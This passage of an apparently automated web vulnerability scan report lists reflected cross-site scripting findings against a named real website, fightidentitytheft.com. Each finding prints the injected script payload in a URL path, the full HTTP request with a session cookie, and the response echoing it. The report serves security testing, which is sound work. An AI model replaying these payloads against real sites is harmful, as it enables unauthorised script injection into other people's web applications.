This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus/superfish14ab9"><script>alert(1)</script>e32dcc02810/js/jquery.bgiframe.min.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:54:19 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:54:19 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus/superfish14ab9"><script>alert(1)</script>e32dcc02810/js/jquery.bgiframe.min.js?i">
...[SNIP]...

6.304. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf14b"><script>alert(1)</script>a88c7a52980 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus/superfish/jscf14b"><script>alert(1)</script>a88c7a52980/jquery.bgiframe.min.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:55:10 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:55:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus/superfish/jscf14b"><script>alert(1)</script>a88c7a52980/jquery.bgiframe.min.js?i">
...[SNIP]...

6.305. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5afe2"><script>alert(1)</script>6db977cc1e7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js5afe2"><script>alert(1)</script>6db977cc1e7?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:55:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:55:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus/superfish/js/jquery.bgiframe.min.js5afe2"><script>alert(1)</script>6db977cc1e7?i">
...[SNIP]...

6.306. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66134"><script>alert(1)</script>bc519ff9086 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites66134"><script>alert(1)</script>bc519ff9086/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:48:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:48:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites66134"><script>alert(1)</script>bc519ff9086/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js?i">
...[SNIP]...

6.307. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78aa6"><script>alert(1)</script>dad5a9d5fda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all78aa6"><script>alert(1)</script>dad5a9d5fda/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:50:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:50:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all78aa6"><script>alert(1)</script>dad5a9d5fda/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js?i">
...[SNIP]...

6.308. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eebba"><script>alert(1)</script>d065651b599 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/moduleseebba"><script>alert(1)</script>d065651b599/nice_menus/superfish/js/jquery.hoverIntent.minified.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:51:45 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:51:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/moduleseebba"><script>alert(1)</script>d065651b599/nice_menus/superfish/js/jquery.hoverIntent.minified.js?i">
...[SNIP]...

6.309. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26b22"><script>alert(1)</script>b5509dfad89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus26b22"><script>alert(1)</script>b5509dfad89/superfish/js/jquery.hoverIntent.minified.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:53:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:53:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus26b22"><script>alert(1)</script>b5509dfad89/superfish/js/jquery.hoverIntent.minified.js?i">
...[SNIP]...

6.310. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23a54"><script>alert(1)</script>afc45db87ac was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus/superfish23a54"><script>alert(1)</script>afc45db87ac/js/jquery.hoverIntent.minified.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:54:13 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:54:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus/superfish23a54"><script>alert(1)</script>afc45db87ac/js/jquery.hoverIntent.minified.js?i">
...[SNIP]...

6.311. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f94e"><script>alert(1)</script>74fe7c884c8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus/superfish/js7f94e"><script>alert(1)</script>74fe7c884c8/jquery.hoverIntent.minified.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:55:27 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:55:27 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus/superfish/js7f94e"><script>alert(1)</script>74fe7c884c8/jquery.hoverIntent.minified.js?i">
...[SNIP]...

6.312. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25ec5"><script>alert(1)</script>80124ed5549 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js25ec5"><script>alert(1)</script>80124ed5549?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:55:59 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:55:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js25ec5"><script>alert(1)</script>80124ed5549?i">
...[SNIP]...

6.313. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/superfish.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f630f"><script>alert(1)</script>ac2141703d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesf630f"><script>alert(1)</script>ac2141703d6/all/modules/nice_menus/superfish/js/superfish.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:48:41 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:48:41 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sitesf630f"><script>alert(1)</script>ac2141703d6/all/modules/nice_menus/superfish/js/superfish.js?i">
...[SNIP]...

6.314. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/superfish.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c068e"><script>alert(1)</script>f4e03b19fa5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/allc068e"><script>alert(1)</script>f4e03b19fa5/modules/nice_menus/superfish/js/superfish.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:50:01 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:50:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/allc068e"><script>alert(1)</script>f4e03b19fa5/modules/nice_menus/superfish/js/superfish.js?i">
...[SNIP]...

6.315. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/superfish.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7331c"><script>alert(1)</script>5f4c4feb246 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/modules7331c"><script>alert(1)</script>5f4c4feb246/nice_menus/superfish/js/superfish.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 19:51:35 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
X-Powered-By: PHP/5.2.12
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:51:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="/print/sites/all/modules7331c"><script>alert(1)</script>5f4c4feb246/nice_menus/superfish/js/superfish.js?i">
...[SNIP]...

6.316. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/superfish.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/superfish.js

Issue detail

